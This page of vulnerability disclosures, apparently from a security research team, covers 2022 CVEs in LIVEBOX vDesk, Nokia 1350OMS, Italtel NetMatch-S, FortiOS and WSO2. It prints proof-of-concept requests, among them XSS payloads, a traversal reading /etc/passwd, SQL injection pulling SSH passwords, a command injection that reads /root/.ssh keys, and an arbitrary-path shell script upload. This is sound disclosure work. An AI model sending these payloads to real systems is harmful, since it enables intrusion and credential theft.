An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /api/v1/vdeskintegration/challenge endpoint. Because only the client-side verifies whether a check was successful, an attacker can modify the response, and fool the application into concluding that the TOTP was correct.

Step-by-step instructions and PoC

The web application implements two-factor authentication through a TOTP code. To check
whether the inserted TOTP is correct, the web-application implements the API
/api/v1/vdeskintegration/challenge. Unfortunately, only the client-side verifies
whether the check was successful, allowing an attacker to modify the response, and fool the
application that the TOTP was correct.

Affected Endpoints

·       https://[...]/api/v1/vdeskintegration/challenge

Below are the evidences with the vulnerability details and the payloads used

The application responds with the following JSON, notifying that the check was not
successful:

{"status":"403","message":"OTP Check failed","totp":true}

The attacker, though, can modify the response, fooling the client-side code that the check
was correct:

{"status":200,"message":"OK","totp":true}

Vulnerability Description: Multiple Improper Access Control- CWE-284

Software Version: < v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45172

CVSv3: 9.8

Severity: Critical

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the  system.

Step-by-step instructions and PoC

A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles. 

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/registration/validateEmail?

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/adduser

·       https://vdeskbridge.[REDACTED]/api/v1/registration/changePasswordUser

Payload used by an attacker to create arbitrary guest users without authentication: 

Below is the payload used to exploit the "Account Theft" (Account TakeOver) vulnerability by the attacker on third-party users (including admins), the follow up request takes as post parameters the "username" of the victims whose password change is to be applied and the "email" of the attacker

Security Impact

A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles. 

Vulnerability Description: Unrestricted Upload of File with Dangerous Type  - CWE-434

            Software Version: ≤ v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45171

CVSS: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Mario Cola, Massimiliano Brolli

The Collaboration vDesk (vSHARE) web page it has been found no protection against arbitrary and potentially dangerous file uploading.

Step-by-step instructions and PoC

A remote user, authenticated to the Collaboration vDesk Web Page, through vSHARE web site section, can arbitrary upload potentially dangerous files without restrictions.

In next picture it is possible to see that file has been successfully uploaded. 

For further information about EICAR: https://www.eicar.org/?page_id=3950

Security Impact

This vulnerability would allow an attacker to exploit the platform by injecting malware and, under certain conditions, to execute code in the remote machine.

Vulnerability Description: Cryptographic Issue (File Encryption API) - CWE-310

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45170

CVSv3: 6.5

Severity: Medium

Credits: Luca Borzacchiello, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to  the administrator role, and steal the accounts of any users on the  system.

Step-by-step instructions and PoC

The application allows a malicious user to decipher a file without knowing the key set by
the user.

The vulnerability can be exploited in the following way:

1.     the attacker logs in the victim account (we assume that the attacker knows the credentials of the victim, or has access to the victim logged account);

2.     the attacker list the ID of the files in the vShare of the victim performing a GET
request to https://vdeskbridge.[HOSTNAME]/api/v1/files?path= ;

3.     the attacker performs a POST request to https://vdeskbridge.[HOSTNAME]
/api/v1/vencrypt/decrypt/file specifying the ID of the cyphered file that
he wants to decipher (obtained at 2).

Notice that the same attack is successful if the attacker downloads the cyphered file, upload
it to its own VDESK account, and performs the same POST request at line 3.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/api/v1/vencrypt/
decrypt/file

Below are the evidences with the vulnerability details and the payloads used.

Paylod used to exploit the vulnerability:

Security Impact

A malicious user can decrypt the file of the victim without knowing the cyphering key. 

Vulnerability Description: Redirection to Untrusted Site ('Open Redirect') – CWE-601

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45169

CVSv3: 5.4

Severity: Medium

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

The web application allows an authenticated user to send an arbitrary push notification (including clickable links) to another arbitrary user of the application.

Step-by-step instructions and PoC

An authenticated user can send an arbitrary push notification to any other user of the system. The push notification can include an (invisible) clickable link.

The vulnerability can be exploited sending a POST request (including the authentication cookie) to the following vulnerable endpoint:

·       https://vdeskbridge.[HOSTNAME]/api/v1/notification/createnotification

Payload used to exploit the vulnerability:

Security Impact

Malicious users send arbitrary push notifications to other users, starting phishing attacks or exploiting other XSS vulnerabilities.

Vulnerability Description: Improper Authentication - CWE-287

Software Version: <= v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45168

CVSSv3: 6.5

Severity: Medium

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Massimiliano Brolli

The web application allows an authenticated user to generate the backup codes before having checked the TOTP. This allows an attacker to completely bypass the check.

Step-by-step instructions and PoC

The application allows a user to set a “Backup Code” to be used during the two-factor authentication (instead of using the TOTP).

Unfortunately, the application allows a user to generate or regenerate the backup codes before checking the TOTP.

 The vulnerability can be exploited in the following way:

1.         logging into the vDesk web application as SAML user;

2.         selecting the “backup code” option;

3.         perform a createbackupcodes request using the session cookie obtained at 2;

4.         use one of the generated backup codes to bypass the two-factor authentication.

Affected Endpoints

•           URL: https://vdesk.[DOMAIN]/login/backup_code

•           URL: https://vdeskbridge.[DOMAIN]/api/v1/vdeskintegration/createbackupcodes

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Security Impact

Malicious users can bypass the two-factor authentication.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-43675

CVSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.

Step-by-step instructions and PoC

Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization. This type of vulnerability has been found on numerous web application endpoints, we'll mention just a few for demonstration purposes.

Affected Endpoints

·       URL: https://<host>/oms1350/pages/otn/cpbLogDisplay?filename=

o   HTTP GET Parameter: filename

·       URL: https://<host>/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=174&connectionName=

o   HTTP GET Parameter: id

·       URL: https://<host>/oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback

o   HTTP GET Parameter: all parameters

Payload used to exploit the vulnerability, it's necessary encode all payloads (URL encoding) in order to exploit the vulnerability:

GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

Cookie: JSESSIONID=; NSPOS_JSESSIONID=

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Improper Neutralization of Directives in Dynamically Evaluated Code – CWE-95

Software Version: v9.7.05

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41763

CVSv3: 8.8

Severity: High

Credits: Claudio Jacomelli, Sebastiano Lanzarotto, Massimiliano Brolli

An issue was discovered in NOKIA AMS 9.7.05. Remote Code Execution exists via the debugger of the ipAddress variable. A remote user, authenticated to the AMS server, could inject code in the PING function. The privileges of the command executed depend on the user that runs the service.

Step-by-step instructions and PoC

A remote user, authenticated to the AMS server, could inject code in the PING function

Affected Endpoints

·       Server: AMS

·       Function: PING Test

Below are the evidences with the vulnerability details and the payloads used.

The step to achieve the vulnerability consist in a simple modification via debugger of the ipAddress variable. This is needed because the frontend application manage to sanitize the content.

Security Impact

The vulnerability lead to execute code on the server machine in which the user is logged in. The privilege of the command executed depends on the user that run the service.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41762

CVSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.

Step-by-step instructions and PoC

The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input from clients before is re-included within the HTTP response returned by the application. Due to the lack of validation of user input, allows an attacker to modify the HTML code and the expected execution flow could be altered.

Affected Endpoints

·       URL: https:// [...]/cgi-bin/R19.9/log.pl?logfile=&bench=1734&c=test&pid=19247&cmd=test

o   HTTP GET Parameter: all parameters

·       URL: https:// [...]/cgi-bin/R19.9/top.pl?logfile=/var/file&bench=[REDACTED]&c=1&pid=15883&cmd=test

o   HTTP GET Parameter: bench, pid

·       URL: https:// [...]/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1&host=1

o   HTTP GET Parameter: id

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

GET /cgi-bin/R19.9/log.pl?logfile="</script><img+src=1+onerror=alert(1)>&bench=123&c=test&pid=19247&cmd=test HTTP/1.1

Host: X.X.X.X

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

This first step consists of replacing the value in the “logfile” GET parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed in several places on the page without any checks being made. The same behavior is the same for all parameters of the request.

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Absolute Path Traversal – CWE-36

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41761

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote authenticated attacker to read files on the filesystem arbitrarily.

Step-by-step instructions and PoC

After authenticating the web application, the endpoint "/cgi-bin/R19.9/viewlog.pl " was identified using a direct object reference in the HTTP request, i.e., using the explicit name of the resource to access. By inserting an arbitrary filename in the “logfile” parameter, it is possible to read arbitrary files present on the filesystem.

Affected Endpoints:

·       URL: https://[...]/cgi-bin/R19.9/viewlog.pl

Parameter:

·       HTTP GET: logfile

Below are the evidences with the vulnerability details and the payloads used.

GET /cgi-bin/R19.9/viewlog.pl?action=getfile&logfile=/etc/passwd HTTP/1.1

Host: [...]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Authorization: Basic [...]

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Te: trailers

Connection: close

Detail of the HTTP request/response showing the exploitation of the vulnerability and the illicit reading of the "/etc/passwd" file:

Security Impact

Exploiting this vulnerability on the web portal it was possible to read the files on the filesystem.

Vulnerability Description: Relative Path Traversal – CWE-23

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41760

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote authenticated attacker to read files on the filesystem arbitrarily.

Step-by-step instructions and PoC

By manipulating the GET "filename" parameter referring to files with sequences such as "dot-dot-slash (../)" it is possible to access arbitrary files and directories stored on the filesystem, including application source code, configuration files and critical system files.

Affected Endpoints:

·       URL: https://[...]:8443/oms1350/data/cpb/log?filename=

Parameter:

·       filename

Below is the evidence.

Detail of the HTTP request/response showing exploitation of the vulnerability.

Security Impact

Exploiting this vulnerability on the web portal it was possible to read the files on the filesystem.

Vulnerability Description: Absolute Path Traversal - CWE-36

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40715

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. An Absolute Path Traversal vulnerability exists for a specific endpoint via the logfile parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.

Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40714

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /oms1350/* endpoints.

Vulnerability Description: Multiple Relative Path Traversal - CWE-23

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40713

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Multiple Relative Path Traversal issues exist in different specific endpoints via the file parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.

Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40712

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /cgi-bin/R14.2* endpoints.

Vulnerability Description: Stored Cross-Site Scripting - CWE-79

Software Version: FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40680

CVSv3: 5.4

Severity: Medium

Credits: Massimiliano Ferraresi, Massimiliano Brolli

A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.

Step-by-step instructions and PoC

Vulnerability can be reproduce through the following actions.

An attacker with system permission can inject arbitrary javascript code in the Replacement Messages pages.

An attacker have to open and modify a page like “FortiGuard Block Page”:

In the HTML source I tried to inject arbitrary javascript code, but with simple payload <script>alert(1);</script> the application did not execute anything:

Probably the application satinizes the <script></script> content and does not execute the javascript code inside these tags, however with a custom payload like <image/src/onerror=prompt("XSS")> is possible to execute arbitrary javascript code:

·       <image/src/onerror=prompt("XSS")>

Click on “ok” and save the setting, the malicious code now is stored in the FortiGuardBlockPage,  if the user visit this page the arbitrary javascript code will execute:

Security Impact

A potential attacker could modify the vulnerable web page with malicious javascript code permanently, thereby attacking anyone who visits the page.

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web Application is affected by SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

Step-by-step instructions and PoC

A remote user, authenticated to the web application may manipulate the request parameters to exploit error output from the database to manipulate its data. It manipulates the database into generating an error that informs the actor of the database’s structure and afterwards extracts the data contents in the database statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.

Affected Endpoints

·       URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1host=1

·       HTTP Parameter: id, host

Below are the evidences with the vulnerability details and the payloads used.

GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1

Host: <host>

Cookie: XSRF=[REDACTED]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Authorization: Basic [REDACTED]

Connection: close

This first step consists of changing the value parameter to obtain a SQL error:

Then the attacker can manipulate the parameter passed to the function, to discover the names of users, data from other tables, or to eventually guess the database hostname. More in detail, it was possible to extract the ssh password of the root user.

Security Impact

Malicious users can access data processed by the database, and potentially conduct further attacks against the database, other portal’s users and the server machine itself.

Vulnerability Description: Insertion of Sensitive Information into Log File - CWE-532

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39821

CVSv3: 7.5

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, an Insertion of Sensitive Information into an Application Log File vulnerability occurs. The web application stores critical information, such as cleartext user credentials, in world-readable files in the filesystem.

Vulnerability Description: Unprotected Storage of Credentials – CWE-256

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39820

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Access credentials for the web application are stored in clear text on the filesystem

Step-by-step instructions and PoC

A remote user, authenticated to the operating system, with access privileges to the directory “/root” and “/DEPOT”, is able to read credentials to access the web portal NFM-T and control all the PPS Network elements.

Affected files:

·       PATH: “/root/RestUploadManager.xml.DRC”

·       PATH: “/DEPOT/KECustom_199/OTNE_DRC/RestUploadManager.xml”

Below is the evidence with the vulnerability details.

Security Impact

An unauthorized user can access the web application with the highest privileges.

Vulnerability Description: OS Command Injection - CWE-78

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39819

CVSv3: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities  occurs. This allows authenticated users to execute commands on the operating system.

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') – CWE-78

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39818

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows any authenticated user to execute commands on the Operating System.

Step-by-step instructions and PoC

The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, that allows an attacker to replace and inject arbitrary system commands with the root privileges of the application user.

Affected Endpoints

·       URL: https://[...]/cgi-bin/R19.9/log.pl

Parameter:

·       HTTP GET: cmd

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&c=22SHOWCA&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1

Host: [...]

Cookie: XSRF=618627

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept-Encoding: gzip, deflate

Authorization: Basic [...]

Referer: https://[...]/cgi-bin/R19.9/actions.pl?session=KALEVO19

Connection: close

This first step consists of replacing the command in the “cmd” GET parameter whit the chosen one to execute the command:

Then, if needed, the output of the command can be read in the specified log file in the previous request “/tmp/.AIClogger-KALEVO19-log12065.log”:

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible to obtain, through the execution of arbitrary commands, a shell for remote control of the endpoint with the root privileges.

Vulnerability Description: SQL Injection - CWE-89

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39817

CVSv3: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple SQL Injection vulnerabilities occurs. Exploitation requires an authenticated attacker. Through the injection of arbitrary SQL statements, a potential authenticated attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

Vulnerability Description: Insufficiently Protected Credentials - CWE-522

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39816

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, Insufficiently Protected Credentials (cleartext administrator password) occur in the edit configuration page. Exploitation requires an authenticated attacker.

Vulnerability Description: OS Command Injection - CWE-78

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39815

CVSv3: 9.8

Severity: Critical

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occurs. This vulnerability allow unauthenticated users to execute commands on the operating system.

Vulnerability Description: Open Redirect - CWE-601

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39814

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, an Open Redirect vulnerability occurs is the login page via next HTTP GET parameter.

Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813

CVSv3: 6,1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.

Step-by-step instructions and PoC.

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.

Affected Endpoints

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

o   HTTP POST Parameter: j_username

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

o   HTTP POST Parameter: name, actLine  

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27

The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>

The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Absolute Path Traversal- CWE-36

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39812

CVSv3: 7,5

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does not check in which directory a file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

Step-by-step instructions and PoC

An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application. An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /home/oam/

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/SaveFileUploader HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------------------------- 102436911942005582423300325296
Content-Length: 484
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/system.jsp
Te: trailers
Connection: close
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="file"; filename="TEST.sh"
Content-Type: application/x-shellscript

TEST
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="fileName"

TEST.sh
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="uploadDir"

/home/oam/
 -----------------------------102436911942005582423300325296—

Security Impact

By exploiting this vulnerability on the web portal it was possible to upload files in an arbitrary path on the filesystem.

Vulnerability Description: Multiple Improper Access Control- CWE-284

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39811

CVSv3: 9,1

Severity: Critical

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 has incorrect Access Control under NMSCI-WebGui/advancedsettings.jsp and NMSCIWebGui/SaveFileUploader. By not verifying permissions for access to resources, it allows an attacker to view pages that are not allowed, and modify the system configuration, bypassing all controls (without checking for user identity).

Step-by-step instructions and PoC

Any user logged in the web application can view pages or use functionalities that are normally accessible only by specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited in order to gather critical information or in order to have unauthorized access to some functionalities.

Affected Endpoints

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader

Below are the evidences with the vulnerability details and the payloads used

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp

As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can by exploited by simply inserting the appropriate endpoint in the URL.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader

We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.

Security Impact

By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.

Vulnerability Description: Cross-Site Scripting - CWE-79

Software Version: 6.4.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39810

CVSv3: 6.1

Severity: Medium

Credits: Tiziano Di Vincenzo, Massimiliano Brolli

An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/ndatasource/validateconnection/ajaxprocessor.jsp via the “driver” parameter. Session hijacking or similar attacks would not be possible.

Vulnerability Description: Cross-Site Scripting - CWE-79

Software Version: 6.4.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39809

CVSv3: 6.1

Severity: Medium

Credits: Tiziano Di Vincenzo, Massimiliano Brolli

